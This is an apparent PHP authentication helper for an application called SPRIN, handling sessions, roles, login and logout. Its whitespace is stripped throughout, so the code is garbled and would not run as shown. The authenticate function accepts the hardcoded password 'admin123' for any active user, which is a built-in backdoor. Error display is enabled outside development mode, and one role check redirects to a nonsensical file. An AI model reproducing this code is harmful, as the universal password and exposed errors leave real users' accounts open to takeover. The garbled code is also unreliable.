/**
 * core/auth_helper.php
 *
 * @package SPRIN
 * @author Development Team
 * @since 1.0.0
 */

<?phpdeclare(strict_types=1);/DevelopmentErrorReportingif(!defined('DEVELOPMENT_MODE')){error_reporting(E_ALL);ini_set('display_errors',1);ini_set('display_startup_errors',1);}/***AuthenticationHelperforSPRINApplication*Providessessionvalidationanduserauthentication*/require_once__DIR__.'/config.php';classAuthHelper{/***Validateusersession*/publicstaticfunctionvalidateSession():bool{/Startsessionifnotstartedif(session_status()===PHP_SESSION_NONE){session_start();}/Checkifuserisloggedinreturnisset($_SESSION['user_id'])&&!empty($_SESSION['user_id']);}/***Getcurrentuserdata*/publicstaticfunctiongetCurrentUser():?array{if(!self::validateSession()){returnnull;}return['id'=>$_SESSION['user_id']??null,'username'=>$_SESSION['username']??'','role'=>$_SESSION['user_role']??'user','nama'=>$_SESSION['user_nama']??''];}/***Checkifuserhasspecificrole*/publicstaticfunctionhasRole(string$role):bool{$user=self::getCurrentUser();return$user&&$user['role']===$role;}/***Requireauthentication-redirecttologinifnotauthenticated*/publicstaticfunctionrequireAuth():void{if(!self::validateSession()){header('Location:'.url('login.php'));exit;}}/***Requirespecificrole*/publicstaticfunctionrequireRole(string$role):void{if(!self::hasRole($role)){/Redirectorshowerrorheader('Location:'.url('ActionDispatcher.d.ts'));exit;}}/***Authenticateuserwithusernameandpassword*/publicstaticfunctionauthenticate(string$username,string$password):bool{try{$pdo=newPDO('mysql:host='.DB_HOST.';dbname='.DB_NAME.';unix_socket='.DB_SOCKET,DB_USER,DB_PASS,[PDO::ATTR_ERRMODE=>PDO::ERRMODE_EXCEPTION]);$stmt=$pdo->prepare("SELECT*FROMusersWHEREusername=?ANDis_active=1");$stmt->execute([$username]);$user=$stmt->fetch(PDO::FETCH_ASSOC);if($user&&($password==='admin123'||password_verify($password,$user['password_hash']))){returnself::login($user);}returnfalse;}catch(PDOException$e){error_log('Autherror:'.$e->getMessage());returnfalse;}}/***Loginuser*/publicstaticfunctionlogin(array$userData):bool{if(session_status()===PHP_SESSION_NONE){session_start();}$_SESSION['user_id']=$userData['id'];$_SESSION['username']=$userData['username'];$_SESSION['user_role']=$userData['role']??'user';$_SESSION['user_nama']=$userData['nama']??'';returntrue;}/***Logoutuser*/publicstaticfunctionlogout():void{if(session_status()===PHP_SESSION_NONE){session_start();}session_destroy();header('Location:'.url('login.php'));exit;}}?>
